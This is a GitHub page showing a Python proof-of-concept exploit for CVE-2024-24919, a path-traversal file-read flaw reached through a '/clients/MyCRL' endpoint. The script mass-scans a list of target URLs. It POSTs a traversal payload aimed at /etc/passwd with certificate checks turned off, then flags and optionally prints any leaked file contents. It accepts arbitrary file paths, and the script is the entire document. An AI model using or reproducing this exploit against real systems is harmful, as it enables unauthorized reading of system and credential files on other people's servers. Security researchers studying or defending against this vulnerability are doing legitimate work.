-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path2-CVE-2024-24919-PoC.py
63 lines (53 loc) · 2.62 KB
/
2-CVE-2024-24919-PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import argparse
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable warnings about insecure HTTP requests
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# List of strings indicating a vulnerable system
VULNERABLE_STRINGS = ['root:', 'nobody:']
def make_request(url, payload, verbose=False):
"""Make an HTTP POST request to the given URL with the provided payload."""
try:
response = requests.post(url, data=payload, verify=False)
if response.ok:
check_vulnerability(url, response.text, payload, verbose)
else:
print(f"[-] {url} responded with status code: {response.status_code}")
except requests.RequestException as e:
print(f"Error making request to {url}: {e}")
def check_vulnerability(url, response_text, payload, verbose):
"""Check the response text for signs of vulnerability."""
for word in VULNERABLE_STRINGS:
if word in response_text:
print(f"Target {url} is vulnerable")
if verbose:
print(response_text)
return
print(f"Target {url} is not vulnerable")
def process_targets(file_path, payload, verbose):
"""Process a list of targets from a file and make requests to each."""
try:
with open(file_path, 'r') as file:
urls = file.readlines()
for url in urls:
url = url.strip()
if url.startswith('http://') or url.startswith('https://'):
make_request(url + '/clients/MyCRL', payload, verbose)
else:
print(f"Skipping invalid URL: {url}")
except FileNotFoundError:
print(f"Error: File '{file_path}' not found.")
except Exception as e:
print(f"An error occurred: {e}")
def main():
"""Main function to parse arguments and initiate the scanning process."""
parser = argparse.ArgumentParser(description="CVE-2024-24919 Exploit, made with love by Proton Negativo.")
payload_default = "aCSHELL/../../../../../../../etc/passwd"
parser.add_argument("-l", metavar='filename', type=str, default='target.txt', help="File containing list of HTTP/HTTPS targets (default: target.txt)")
parser.add_argument("-p", metavar='payload', type=str, default=payload_default, help="Custom payload path (e.g., -p /etc/passwd)")
parser.add_argument("-v", action='store_true', help="Verbose mode to show the response text")
args = parser.parse_args()
process_targets(args.l, args.p, args.v)
if __name__ == "__main__":
main()